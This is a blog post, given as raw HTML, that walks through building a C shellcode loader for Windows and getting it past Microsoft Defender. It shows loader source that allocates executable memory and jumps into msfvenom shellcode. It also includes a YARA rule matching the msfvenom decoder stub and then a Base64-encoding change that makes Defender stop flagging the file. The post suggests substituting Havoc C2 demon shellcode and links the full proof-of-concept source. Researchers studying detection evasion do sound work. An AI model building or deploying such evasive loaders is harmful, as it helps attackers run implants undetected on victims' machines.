<!DOCTYPE html>
<html lang="en-gb"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Slipping through defender with a simple shellcode loader | Primo</title>
<meta property="og:title" content="Slipping through defender with a simple shellcode loader | Primo" />
<meta name="twitter:title" content="Slipping through defender with a simple shellcode loader | Primo" />
<meta itemprop="name" content="Slipping through defender with a simple shellcode loader | Primo" />
<meta name="application-name" content="Slipping through defender with a simple shellcode loader | Primo" />
<meta property="og:site_name" content="Awesome hugo blog" />

<meta name="description" content="Minimal Hugo blog theme with light and dark mode support">
<meta itemprop="description" content="Minimal Hugo blog theme with light and dark mode support" />
<meta property="og:description" content="Minimal Hugo blog theme with light and dark mode support" />
<meta name="twitter:description" content="Minimal Hugo blog theme with light and dark mode support" />

<meta property="og:locale" content="en-gb" />
<meta name="language" content="en-gb" />

  <link rel="alternate" hreflang="en-gb" href="https://0xprimo.github.io/posts/slipping-through-defender/" title="English" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2025-02-21T15:37:42&#43;0100 />
    <meta property="article:published_time" content=2025-02-21T15:37:42&#43;0100 />
    <meta property="og:url" content="https://0xprimo.github.io/posts/slipping-through-defender/" />

    
    <meta property="og:article:author" content="Primo" />
    <meta property="article:author" content="Primo" />
    <meta name="author" content="Primo" />
    
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Slipping through defender with a simple shellcode loader",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2025-02-21",
        "description": "",
        "wordCount":  740 ,
        "mainEntityOfPage": "True",
        "dateModified": "2025-02-21",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Primo"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.147.1">

    
    <meta property="og:url" content="https://0xprimo.github.io/posts/slipping-through-defender/">
  <meta property="og:site_name" content="Primo">
  <meta property="og:title" content="Slipping through defender with a simple shellcode loader">
  <meta property="og:description" content="This blog is for educational purposes only. The content provided is intended to share knowledge and insights related to cybersecurity.
Shellcode loader? A shellcode loader is a program designed to execute shellcode within a local or remote process. all shellcode loaders share the same steps when it come to loading a shellcode:
Memory Allocation – This is done using functions like KERNEL32!VirtualAlloc(Ex) or NTDLL!NtAllocateVirtualMemory(Ex). . Copy Shellcode – The shellcode is then copied into the allocated memory region. Execute Shellcode – Running the shellcode using KERNEL32!CreateThread(Ex), NTDLL!NtCreateThread(Ex) NTDLL!RtlCreateUserThread, or executing it directly by casting it to a function pointer (void(*)()). Why you need one? The cool thing about having a shellcode loader is that you can add techniques for evasion like stack spoofing (hook windows api used by the beacon and spoof its stack), sleep obfuscation (hook sleep api used by the beacon and encrypt process stack/heap before sleep), anti-static/dynamic/sandbox, etc. i’ll cover these techniques in later posts. The main purpose, though, is just to load and execute the shellcode.">
  <meta property="og:locale" content="en_gb">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2025-02-21T15:37:42+01:00">
    <meta property="article:modified_time" content="2025-02-21T15:37:42+01:00">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Slipping through defender with a simple shellcode loader">
  <meta name="twitter:description" content="This blog is for educational purposes only. The content provided is intended to share knowledge and insights related to cybersecurity.
Shellcode loader? A shellcode loader is a program designed to execute shellcode within a local or remote process. all shellcode loaders share the same steps when it come to loading a shellcode:
Memory Allocation – This is done using functions like KERNEL32!VirtualAlloc(Ex) or NTDLL!NtAllocateVirtualMemory(Ex). . Copy Shellcode – The shellcode is then copied into the allocated memory region. Execute Shellcode – Running the shellcode using KERNEL32!CreateThread(Ex), NTDLL!NtCreateThread(Ex) NTDLL!RtlCreateUserThread, or executing it directly by casting it to a function pointer (void(*)()). Why you need one? The cool thing about having a shellcode loader is that you can add techniques for evasion like stack spoofing (hook windows api used by the beacon and spoof its stack), sleep obfuscation (hook sleep api used by the beacon and encrypt process stack/heap before sleep), anti-static/dynamic/sandbox, etc. i’ll cover these techniques in later posts. The main purpose, though, is just to load and execute the shellcode.">


    

    <link rel="canonical" href="https://0xprimo.github.io/posts/slipping-through-defender/">
    <link href="/style.min.2d921c18cf1ec555ffc03d59a8adc211c402c68c930c27d6a0c306ab175a8d09.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://0xprimo.github.io/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
    
</head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://0xprimo.github.io/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/about/">
                        About
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Slipping through defender with a simple shellcode loader</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2025-02-21T15:37:42&#43;01:00" itemprop="datePublished"> 21 Feb 2025 </time>
                </div>
                
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b>Table of Contents</b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#shellcode-loader">Shellcode loader?</a></li>
    <li><a href="#why-you-need-one">Why you need one?</a></li>
    <li><a href="#simple-shellcode-loader">Simple shellcode loader</a></li>
    <li><a href="#how-did-we-get-detected">How did we get detected?</a></li>
    <li><a href="#how-can-we-bypass-this-detection">How can we bypass this detection?</a></li>
    <li><a href="#conclusion">Conclusion</a></li>
    <li><a href="#references">References</a></li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <blockquote>
<p>This blog is for educational purposes only. The content provided is intended to share knowledge and insights related to cybersecurity.</p></blockquote>
<h2 id="shellcode-loader">Shellcode loader?</h2>
<p>A <strong>shellcode loader</strong> is a program designed to execute shellcode within a local or remote process. all shellcode loaders share the same steps when it come to loading a shellcode:</p>
<ol>
<li><strong>Memory Allocation</strong> – This is done using functions like <code>KERNEL32!VirtualAlloc(Ex)</code> or <code>NTDLL!NtAllocateVirtualMemory(Ex)</code>. .</li>
<li><strong>Copy Shellcode</strong> – The shellcode is then copied into the allocated memory region.</li>
<li><strong>Execute Shellcode</strong> – Running the shellcode using <code>KERNEL32!CreateThread(Ex)</code>, <code>NTDLL!NtCreateThread(Ex)</code> <code>NTDLL!RtlCreateUserThread</code>, or executing it directly by casting it to a function pointer <code>(void(*)())</code>.</li>
</ol>
<h2 id="why-you-need-one">Why you need one?</h2>
<p>The cool thing about having a shellcode loader is that you can add techniques for evasion like stack spoofing (<strong>hook windows api used by the beacon and spoof its stack</strong>), sleep obfuscation (<strong>hook sleep api used by the beacon and encrypt process stack/heap before sleep</strong>), anti-static/dynamic/sandbox, etc. i&rsquo;ll cover these techniques in later posts. The main purpose, though, is just to load and execute the shellcode.</p>
<p>let&rsquo;s cook!
<img src="Slipping-Through-Defender/images/w.w-cooking-malware.png" alt=""></p>
<h2 id="simple-shellcode-loader">Simple shellcode loader</h2>
<p>let&rsquo;s start by writing a simple shellcode loader.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;windows.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl"><span class="c1">// msfvenom -p windows/x64/exec cmd=calc -f c
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span> <span class="p">]</span> <span class="o">=</span> <span class="s">&#34;</span><span class="se">\xfc\x48\x83\xe4\xf0</span><span class="s">...&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span> <span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">    <span class="n">PVOID</span> <span class="n">pMemory</span> <span class="o">=</span> <span class="nf">VirtualAlloc</span><span class="p">(</span>  <span class="nb">NULL</span><span class="p">,</span> 
</span></span><span class="line"><span class="cl">                                   <span class="k">sizeof</span><span class="p">(</span> <span class="n">buf</span> <span class="p">),</span> 
</span></span><span class="line"><span class="cl">                                   <span class="n">MEM_COMMIT</span><span class="p">,</span> 
</span></span><span class="line"><span class="cl">                                   <span class="n">PAGE_EXECUTE_READWRITE</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">memcpy</span><span class="p">(</span> <span class="n">pMemory</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span> <span class="n">buf</span> <span class="p">)</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">((</span> <span class="kt">int</span><span class="p">(</span> <span class="o">*</span> <span class="p">)(</span> <span class="p">)</span> <span class="p">)</span><span class="n">pMemory</span><span class="p">)(</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="p">(</span> <span class="mi">0</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Compiling and dropping the file triggers defender. that means we got detect just in the static analysis phase.</p>
<div style="display: flex; justify-content: center; align-items: center;">
  <video controls 
         width="680"
         
         
         
         >
    <source src="https://0xprimo.github.io/Slipping-Through-Defender/videos/defender-detection.mp4" type="video/mp4">
    Your browser doesn't support video playback.
  </video>
</div>


<h2 id="how-did-we-get-detected">How did we get detected?</h2>
<p>AV/EDR software use <strong>static analysis</strong> to identify malicious applications without executing them. One of the primary techniques used in this process is <strong>pattern scanning</strong>, where the AV/EDR scans files for specific byte sequences for example pattern associated with a known malware family or decryption/encryption loop, etc.</p>
<p>A well-known tool for this purpose is <strong>YARA</strong>, a pattern-scanning tool that allows users to define custom rules for detecting malicious files and processes.</p>
<p>I just made a rule to detect the decryption stage of the previous generated shellcode with <code>msfvenom</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">rule</span> <span class="n">msfvenom_shellcode_decoding</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nl">meta</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">author</span> <span class="o">=</span> <span class="s">&#34;0xPrimo&#34;</span>
</span></span><span class="line"><span class="cl">        <span class="n">desc</span>   <span class="o">=</span> <span class="s">&#34;Decryption stage of generated metasploit shellcode&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nl">strings</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm">            0000002d  48                 dec     eax
</span></span></span><span class="line"><span class="cl"><span class="cm">            0000002e  31c0               xor     eax, eax  {0x0}
</span></span></span><span class="line"><span class="cl"><span class="cm">            00000030  ac                 lodsb   byte [esi]  {0x0}
</span></span></span><span class="line"><span class="cl"><span class="cm">            00000031  3c61               cmp     al, 0x61
</span></span></span><span class="line"><span class="cl"><span class="cm">            00000033  7c02               jl      0x37
</span></span></span><span class="line"><span class="cl"><span class="cm">        */</span>
</span></span><span class="line"><span class="cl">        <span class="err">$</span><span class="n">a</span>   <span class="o">=</span> <span class="p">{</span> <span class="mi">48</span> <span class="mi">31</span> <span class="n">c0</span> <span class="n">ac</span> <span class="mi">3</span><span class="n">c</span> <span class="o">??</span> <span class="p">}</span>
</span></span><span class="line"><span class="cl">        
</span></span><span class="line"><span class="cl">        <span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm">            00000035  2c20               sub     al, 0x20
</span></span></span><span class="line"><span class="cl"><span class="cm">            00000037  41                 inc     ecx
</span></span></span><span class="line"><span class="cl"><span class="cm">            00000038  c1c90d             ror     ecx, 0xd
</span></span></span><span class="line"><span class="cl"><span class="cm">            0000003b  41                 inc     ecx
</span></span></span><span class="line"><span class="cl"><span class="cm">            0000003c  01c1               add     ecx, eax
</span></span></span><span class="line"><span class="cl"><span class="cm">            0000003e  e2ed               loop    0x2d
</span></span></span><span class="line"><span class="cl"><span class="cm">        */</span>
</span></span><span class="line"><span class="cl">        <span class="err">$</span><span class="n">b</span>   <span class="o">=</span> <span class="p">{</span> <span class="mi">2</span><span class="n">c</span> <span class="o">??</span> <span class="mi">41</span> <span class="n">c1</span> <span class="n">c9</span> <span class="o">??</span> <span class="mi">41</span> <span class="mo">01</span> <span class="n">c1</span> <span class="n">e2</span> <span class="n">ed</span> <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nl">condition</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">all</span> <span class="n">of</span> <span class="n">them</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>After scanning the project directory we can see that YARA found files that match the rule we just created.</p>




<div class="clickable-image-container">
    <img src="https://0xprimo.github.io/Slipping-Through-Defender/images/yara-detection.png" 
         alt="detecting msfvenom shellcode with yara"
         width="800"
         
         class="clickable-image"
         onclick="openImageModal('img-d37a942a9d444c3137046c061696d2d3-1')"
         style="cursor: pointer;">
</div>


<div id="img-d37a942a9d444c3137046c061696d2d3-1" class="image-modal" onclick="closeImageModal('img-d37a942a9d444c3137046c061696d2d3-1')">
    <span class="image-modal-close">&times;</span>
    <img class="image-modal-content" src="https://0xprimo.github.io/Slipping-Through-Defender/images/yara-detection.png" alt="detecting msfvenom shellcode with yara">
    <div class="image-modal-caption">detecting msfvenom shellcode with yara</div>
</div>

<style>
.clickable-image {
    transition: opacity 0.3s ease;
}

.clickable-image:hover {
    opacity: 0.8;
}

.image-modal {
    display: none;
    position: fixed;
    z-index: 1000;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.9);
    animation: fadeIn 0.3s;
}

.image-modal-content {
    margin: auto;
    display: block;
    max-width: 90%;
    max-height: 90%;
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    animation: zoomIn 0.3s;
}

.image-modal-close {
    position: absolute;
    top: 15px;
    right: 35px;
    color: #f1f1f1;
    font-size: 40px;
    font-weight: bold;
    cursor: pointer;
    z-index: 1001;
}

.image-modal-close:hover,
.image-modal-close:focus {
    color: #bbb;
    text-decoration: none;
}

.image-modal-caption {
    margin: auto;
    display: block;
    width: 80%;
    max-width: 700px;
    text-align: center;
    color: #ccc;
    padding: 10px 0;
    position: absolute;
    bottom: 20px;
    left: 50%;
    transform: translateX(-50%);
}

@keyframes fadeIn {
    from { opacity: 0; }
    to { opacity: 1; }
}

@keyframes zoomIn {
    from { transform: translate(-50%, -50%) scale(0.5); }
    to { transform: translate(-50%, -50%) scale(1); }
}

@media only screen and (max-width: 700px) {
    .image-modal-content {
        width: 100%;
        max-width: 95%;
        max-height: 95%;
    }
    
    .image-modal-caption {
        font-size: 14px;
        bottom: 10px;
    }
    
    .image-modal-close {
        font-size: 30px;
        top: 10px;
        right: 20px;
    }
}
</style>

<script>
function openImageModal(modalId) {
    document.getElementById(modalId).style.display = "block";
    document.body.style.overflow = "hidden"; 
}

function closeImageModal(modalId) {
    document.getElementById(modalId).style.display = "none";
    document.body.style.overflow = "auto"; 
}


document.addEventListener('keydown', function(event) {
    if (event.key === 'Escape') {
        const modals = document.querySelectorAll('.image-modal');
        modals.forEach(modal => {
            if (modal.style.display === 'block') {
                modal.style.display = 'none';
                document.body.style.overflow = "auto";
            }
        });
    }
});
</script>

<h2 id="how-can-we-bypass-this-detection">How can we bypass this detection?</h2>
<p>as i said before the power of having a shellcode loader is you can customize it as you want and add evasion techniques to it to bypass these detections.</p>
<p>One technique used to bypass static analysis is payload encoding. We simply encode our payload to Base64 and then implement a function to decode it during execution. This way, when the scanner scans our file on the disk, it will only see Base64 string and not the shellcode.</p>
<p>i just implemented this function to help me decode the payload at runtime.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">BOOL</span> <span class="nf">Base64Decode</span><span class="p">(</span> <span class="n">LPCSTR</span> <span class="n">Input</span><span class="p">,</span> <span class="n">PBYTE</span><span class="o">*</span> <span class="n">Output</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="o">*</span> <span class="n">OutLen</span> <span class="p">);</span>
</span></span></code></pre></div><p>our shellcode loader now will look like this.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">// msfvenom -p windows/x64/exec CMD=calc.exe -f base64
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="kt">char</span> <span class="n">buf_b64</span><span class="p">[]</span> <span class="o">=</span> <span class="s">&#34;/EiD5PDowAAA...&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span> <span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">PBYTE</span>	<span class="n">pShellcode</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">SIZE_T</span>	<span class="n">sShellcode</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">Base64Decode</span><span class="p">(</span> <span class="n">buf_b64</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pShellcode</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sShellcode</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">PVOID</span> <span class="n">pMemory</span> <span class="o">=</span> <span class="nf">VirtualAlloc</span><span class="p">(</span> <span class="nb">NULL</span><span class="p">,</span> 
</span></span><span class="line"><span class="cl">                                  <span class="n">sShellcode</span><span class="p">,</span> 
</span></span><span class="line"><span class="cl">                                  <span class="n">MEM_COMMIT</span><span class="p">,</span> 
</span></span><span class="line"><span class="cl">                                  <span class="n">PAGE_EXECUTE_READWRITE</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">memcpy</span><span class="p">(</span> <span class="n">pMemory</span><span class="p">,</span> <span class="n">pShellcode</span><span class="p">,</span> <span class="n">sShellcode</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">((</span> <span class="kt">int</span><span class="p">(</span> <span class="o">*</span> <span class="p">)(</span> <span class="p">)</span> <span class="p">)</span><span class="n">pMemory</span><span class="p">)(</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="p">(</span> <span class="mi">0</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>and as you can see defender thinks we&rsquo;re okay.</p>
<div style="display: flex; justify-content: center; align-items: center;">
  <video controls 
         width="680"
         
         
         
         >
    <source src="https://0xprimo.github.io/Slipping-Through-Defender/videos/defender-whats-that.mp4" type="video/mp4">
    Your browser doesn't support video playback.
  </video>
</div>


<p>let&rsquo;s replace msfvenom shellcode with havoc demon shellcode.</p>
<p>PoC source code can be found <a href="https://github.com/0xPrimo/blogs-poc/tree/main/Slipping%20through%20defender">here</a></p>
<h2 id="conclusion">Conclusion</h2>
<p>To conclude, we’ve covered what a shellcode loader is and its purpose. We also used a simple trick to bypass static analysis. It’s important to note that a memory scanner will most likely detect our shellcode as they will find it unencrypted, but there are ways to bypass this, which we’ll cover in later posts. Thanks for reading, and have a great day!</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://gatari.dev/posts/memory-lane/">https://gatari.dev/posts/memory-lane/</a></li>
<li><a href="https://github.com/kyleavery/AceLdr">https://github.com/kyleavery/AceLdr</a></li>
<li><a href="https://github.com/boku7/BokuLoader">https://github.com/boku7/BokuLoader</a></li>
</ul>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/0xPrimo" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://x.com/cr4ckeddd" target="_blank" rel="noopener noreferrer me"
    title="Twitter">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z">
    </path>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2025 Primo.
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    




    
    
        
    

    
    
        
    



    
    <script src="https://0xprimo.github.io/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js" integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30&#43;lSNuSkl4QXuNyy8="></script>

    

</body>
</html>
